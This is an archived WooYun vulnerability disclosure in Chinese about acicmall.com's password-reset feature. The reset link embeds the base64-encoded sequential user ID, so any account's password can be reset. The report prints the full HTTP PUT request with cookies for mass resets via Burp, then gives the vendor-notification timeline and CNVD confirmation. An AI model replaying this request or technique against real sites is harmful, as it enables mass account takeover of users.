乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-31: 细节已通知厂商并且等待厂商处理中 2015-08-03: 厂商已经确认,细节仅向厂商公开 2015-08-13: 细节向核心白帽子及相关领域专家公开 2015-08-23: 细节向普通白帽子公开 2015-09-02: 细节向实习白帽子公开 2015-09-17: 细节向公众公开
可批量重置所有密码
http://www.acicmall.com/
忘记密码
http://www.acicmall.com/uum/member/resetPassword/MzIwMzM=
base64解密
于是我就猜想这会不会是我的id于是我又注册了一个号,另一个找回密码的链接
http://www.acicmall.com/uum/member/resetPassword/MzIwMzQ=
我们就可以用burp爆破批量重置
POST /uum/member/resetPassword/MzIwMzQ%3d.json HTTP/1.1Host: www.acicmall.comContent-Length: 51Accept: application/json, text/javascript, */*; q=0.01Origin: http://www.acicmall.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://www.acicmall.com/uum/member/resetPassword/MQ==Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: JSESSIONID=6BD91F4D8255F9E511DE8523E1153290.tomcat; __utmt=1; __utma=51504825.1498594672.1438339777.1438339777.1438339777.1; __utmb=51504825.318.10.1438339777; __utmc=51504825; __utmz=51504825.1438339777.1.1.utmcsr=e-acic.com|utmccn=(referral)|utmcmd=referral|utmcct=/pearson/car.php; CNZZDATA5255242=cnzz_eid%3D833499177-1438339776-http%253A%252F%252Fwww.e-acic.com%252F%26ntime%3D1438339776; bfd_s=51504825.2923894.1438339798038; tmc=51.51504825.39029193.1438339798044.1438342286940.1438342386051; tma=51504825.39029193.1438339798044.1438339798044.1438339798044.1; tmd=51.51504825.39029193.1438339798044.; bfd_g=8a7bc81f66bd068d000017a500227e3055b61944Connection: closepassword=wooyun123&rePassword=wooyun123&_method=PUT
就不试了
危害等级:高
漏洞Rank:10
确认时间:2015-08-03 16:34
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无